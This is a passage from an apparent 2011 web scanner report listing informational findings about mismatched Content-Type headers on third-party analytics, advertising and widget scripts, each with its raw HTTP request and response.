Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 68
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:32:49 GMT

gomez.b2(321575940457221,1);gomez.b1(0.1,0);if(gomez.n0)gomez.n0(1);

30.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/566828221 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-06b34e08/p/travelocity.com/566828221

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-06b34e08/p/travelocity.com/566828221?mr='11079'&mi='1.2097296377.1305508833042'&mt=!n&cs=!t&e=!(viewPage,gr)&pt=unknown&r=''&sw=1920&sh=1200&sc=32&j=!t&u='http://travel.travelocity.com/ecruise/Cruise/Disney-Cruise-Line-Cruises'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://travel.travelocity.com/ecruise/Cruise/Disney-Cruise-Line-Cruises
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 31
Expires: Mon, 09 May 2011 01:29:53 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:29:53 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 566828221]]);

30.3. http://blog.us.playstation.com/wp-content/themes/twenty11/images/ps_bg_support_gif.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blog.us.playstation.com
Path:	/wp-content/themes/twenty11/images/ps_bg_support_gif.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /wp-content/themes/twenty11/images/ps_bg_support_gif.gif HTTP/1.1
Host: blog.us.playstation.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1305491253|session#1305491190457-245340#1305493053; APPLICATION_SITE_URL=http%3A//us.playstation.com/psn/; __utmz=1.1305491193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.170304013.1305491193.1305491193.1305491193.1; __utmc=1; __utmb=1.2.10.1305491193; __utmz=110009370.1305491197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=110009370.1768330900.1305491197.1305491197.1305491197.1; __utmc=110009370; __utmb=110009370.1.10.1305491197

Response

HTTP/1.1 200 OK
Age: 1002546
Date: Wed, 04 May 2011 05:21:53 GMT
Expires: Sun, 05 Jun 2011 05:24:33 GMT
Cache-Control: max-age=2764800 ,public
Connection: Keep-Alive
Via: N1.MIA1: 100
Server: nginx
Content-Type: image/gif
Content-Length: 185
Last-Modified: Mon, 14 Mar 2011 15:03:46 GMT
Cneonction: close
Accept-Ranges: bytes

.PNG
.
...IHDR.......G.............tEXtSoftware.Adobe ImageReadyq.e<...[IDATx.bbeeeb``@..........r..RyBj.)G/=..7..C...%..)...@.$**........_x^.....M......2.\s....0..V.\.
K.....IEND.B`.

30.4. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

30.5. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.gigya.com
Path:	/js/gigya.services.socialize.plugins.simpleshare.min.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/gigya.services.socialize.plugins.simpleshare.min.js HTTP/1.1
Host: cdn.gigya.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551

Response

HTTP/1.1 200 OK
Content-Length: 21429
Content-Type: application/x-javascript
Last-Modified: Sun, 01 May 2011 07:04:34 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
x-server: web103
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Sun, 15 May 2011 21:19:57 GMT
Connection: close

gigya.global._GetElementPos=function(obj){var curleft=curtop=0;if(obj.offsetParent){do{curleft+=obj.offsetLeft;curtop+=obj.offsetTop;}while(obj=obj.offsetParent);}return{left:curleft,top:curtop};};gig
...[SNIP]...

30.6. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://contextweb.usatoday.net
Path:	/asp/Context/ContextWebHandler.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /asp/Context/ContextWebHandler.ashx?URL=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1 HTTP/1.1
Host: contextweb.usatoday.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 93
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: private, max-age=2555494
Date: Mon, 16 May 2011 01:19:44 GMT
Connection: close

var ContextWebKeywords="key=cw27+cw369+cw368+cw356+cw371+cw370;kvcw=27:369:368:356:371:370;";

30.7. http://eval.bizrate.com/js/survey_126457_1.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://eval.bizrate.com
Path:	/js/survey_126457_1.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

30.8. http://feeds.delicious.com/v2/json/urlinfo/data previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://feeds.delicious.com
Path:	/v2/json/urlinfo/data

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v2/json/urlinfo/data?url=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2F2011%2F05%2F09%2Fthe-dream-differences-on-disney-cruise-line%2F&callback=jsonp1305508793345 HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
Referer: http://www.magicalkingdoms.com/blog/2011/05/09/the-dream-differences-on-disney-cruise-line/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:20:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.4
Content-Length: 22

jsonp1305508793345([])

30.9. http://fingerhut-www.baynote.net/baynote/tags3/common previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://fingerhut-www.baynote.net
Path:	/baynote/tags3/common

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=ISO-8859-1

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=fingerhut&code=www&timeout=undefined&onFailure=undefined HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fingerhut-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:28:19 GMT
Content-Length: 78159

baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...

30.10. http://gs.instantservice.com/geoipAPI.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://gs.instantservice.com
Path:	/geoipAPI.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /geoipAPI.js?src=ii3&ts=1305509228 HTTP/1.1
Host: gs.instantservice.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:33:22 GMT
Server: Apache
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 477
Connection: close
Content-Type: text/javascript; charset=utf-8

isgeoipapi_continent_code = "NA";isgeoipapi_country_code = "US";isgeoipapi_country_name = "United States";isgeoipapi_region = "TX";isgeoipapi_city = "Dallas";isgeoipapi_dma_code = "623";isgeoipapi_are
...[SNIP]...

30.11. http://https.edge.ru4.com/smartserve/ad previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://https.edge.ru4.com
Path:	/smartserve/ad

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

30.12. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ipinvite.iperceptions.com
Path:	/Invitations/Javascripts/ip_Layer_Invitation_903.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /Invitations/Javascripts/ip_Layer_Invitation_903.aspx HTTP/1.1
Host: ipinvite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Mon, 16 May 2011 01:38:57 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-by: INVSVR10
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 351

var _http = document.location.protocol;var gLink = _http +'//ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.js';var script = document.createElement('script'); script.setA
...[SNIP]...

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b1139be6bc27a0107ea3fafa6bc66290a5e4901c66449407eaead3c062013e948ce98836c6ae4f48bc0a677d48de9109ba9f81c0adda9668dcf3868ac5307153b025338ebe5b5422ea4af743d0141749c639ad70ccbd31237c2a742c40719df3207ef5dd54f702632f58045b6e44bcca9d6a9060b2ca294a1c6c3e821c27f51b4679ad80bd6619d689e737f8aad5a15363b2761f8586e4ce4695ee1944d4695e2fdbad38ff824a43cc131fd452fce2a70a89ee5a7811f32ef0c544ac6f3b9c4bdbb09c0480bbc0cdeaa5da019ab9355b6b76f9f766b060164eb11

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b3735b56bff791556b569e5e8e5242213410e46817a400930a8a5210c391eb4099bcdd45011c8c2b4edf7228481e91dc3f9c6351ac5eb78c686743ae34c0f193c0f5e25e2f9c11e68faf23a27751d30db21d18f34cfde0468a1a617f42a00cf7209ab4a9216327370b8d618eca71f90ecccf5415273b68aada887b54ba32604e61fcb904980258a678379798baa4414353b6f78ea033614b82e0ab09a5562e8c8d6a2c4c0b824a928c637f44222cd3c68a4f089e2c04760f501414adef2a7cca4fa49831a56ff1edcb91ce345c1d008e6f37a87293457074e626b842250ca5e307da3a5e46ffb4c736227395daeaaa5bc747ad115097fe63832d4021305db140de7cc84ebd182f34aa56da56d73a5ff1e5bcb2efdbf54edfb0fc746c5c8871b2ed942f4ea6203be921f533a8d8b6dfd5eb99b71b31a912f060e8d9da8ae0dd543ae249e956a8b64b1964d41954eca97247abd18e042fcb7170aed7bb7e0d7cee603452c43

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b3735b56bff791556b569e5e8e5242213410e46817a400930a8a5210c391eb4099bcdd45011c8c2b4edf7228481e91dc3f9c6351ac5eb78c686743ae34c0f193c0f5e25e2f9c11e68faf23a27751d30db21d18f34cfde0468a1a617f42a00cf7209ab4a9216327370b8d618eca71f90ecccf5415273b68aada887b54ba32604e61fcb904980258a678379798baa4414353b6f78ea033614b82e0ab09a5562e8c8d6a2c4c0b824a928c637f44222cd3c68a4f089e2c04760f501414adef2a7cca4fa49831a56ff1edcb91ce345c1d008e6f37a87293457074e626b842250ca5e307da3a5e46ffb4c736227395daeaaa5bc747ad115097fe63832d4021305db140de7cc84ebd182f34aa56da56d73a5ff1e5bcb2efdbf54edfb0fc746c5c8871b2ed942f4ea6203be921f533a8d8b6dfd5eb99b71b31a912f060e8d9da8ae0dd543ae249e956a8b64b1964d41954eca97247abd18e042fcb7170aed7bb7e0d7cee603452c43 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=15AB95930407CBF65267947113A0090A

Response

30.15. http://secureshopping.mcafee.com/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://secureshopping.mcafee.com
Path:	/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

30.16. http://shop.pacsun.com/js/widget-qv-uc.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://shop.pacsun.com
Path:	/js/widget-qv-uc.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/widget-qv-uc.jsp HTTP/1.1
Host: shop.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4A5CD2AB14DCF8A7583336761C49C5F9; PIPELINE_SESSION_ID=f678eccdc0a8116800f19d6e8f776319; stop_mobi=yes; Country=US; Currency=USD

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 6093
Cache-Control: max-age=1
Date: Mon, 16 May 2011 01:43:40 GMT
Connection: close

/* QuickView Javascript */
/* ---------------------------------------- */

//quickViewcommands[0] = "show" action
//quickViewcommands[1] = "add product" action
var quickViewCommands = new Array(2);

...[SNIP]...

30.17. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

30.18. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sony.tt.omtrdc.net
Path:	/m2/sony/mbox/ajax

Issue detail

The response contains the following Content-type statement:

Content-Type: text/JavaScript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/sony/mbox/ajax?mboxHost=www.sonystyle.com&mboxSession=1305494389047-605069&mboxPage=1305494396673-786615&screenHeight=1200&screenWidth=1920&browserWidth=1137&browserHeight=765&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=1&mbox=emptyMbox&mboxId=0&mboxTime=1305476396673&vmt=48FB612B&ppu=TC1&ce=ISO-8859-1&pageName=Sony%20Store&cc=USD&h1=Sony%20Store&c3=StoreCatalogDisplay&c6=Sony%20Store_&c27=Sony%20Store%20-%20Control&v23=United%20States%20English&v27=Sony%20Store%20-%20Control&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=765&mboxURL=http%3A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: sony.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551

Response

30.19. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sonycomputerentertai.tt.omtrdc.net
Path:	/m2/sonycomputerentertai/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/sonycomputerentertai/mbox/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491192268-399662&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=2&mbox=mbox_psn&mboxId=0&mboxTime=1305473207208&mboxURL=http%3A%2F%2Fus.playstation.com%2Fpsn%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/psn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

30.20. http://sr2.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=71737897 HTTP/1.1
Host: sr2.liveperson.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
Cookie: LivePersonID=LP i=16601155425835,d=1302186497

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71737897
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1dbf"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Sun, 15 May 2011 21:20:03 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

30.21. http://ts.istrack.com/trackingAPI.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ts.istrack.com
Path:	/trackingAPI.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trackingAPI.js?ai=+ZY8Rw5iEzG1Y4OXvbR6/cnk0hqmPD1z HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ts.istrack.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:29:02 GMT
Server: Apache
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 73
Connection: close
Content-Type: text/javascript; charset=utf-8

ISVT_setCookie('isvt_visitor', 'lKDrXwoBC2YAADZkxukAAAAAADT565Sml5bdeG');

30.22. http://us.playstation.com/uwps/CookieHandler previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://us.playstation.com
Path:	/uwps/CookieHandler

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /uwps/CookieHandler HTTP/1.1
Host: us.playstation.com
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
Content-Length: 0
Origin: http://us.playstation.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1305491253|session#1305491190457-245340#1305493053; APPLICATION_SITE_URL=http%3A//us.playstation.com/psn/; APPLICATION_SIGNOUT_URL=http%3A//us.playstation.com/psn/; __utmz=1.1305491193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.170304013.1305491193.1305491193.1305491193.1; __utmc=1; __utmb=1.2.10.1305491193; JSESSIONID=9VngNQ2p9KPpTrGf9pbCZhPt1H66bySJZhqmTR5cthqjysWvy6TD!436731054

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:26:41 GMT
Server: Apache
ntCoent-Length: 4
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 4

null

30.23. http://webassets.scea.com/pscomauth/groups/public/documents/webasset/psn_favicon.ico previous next

Summary

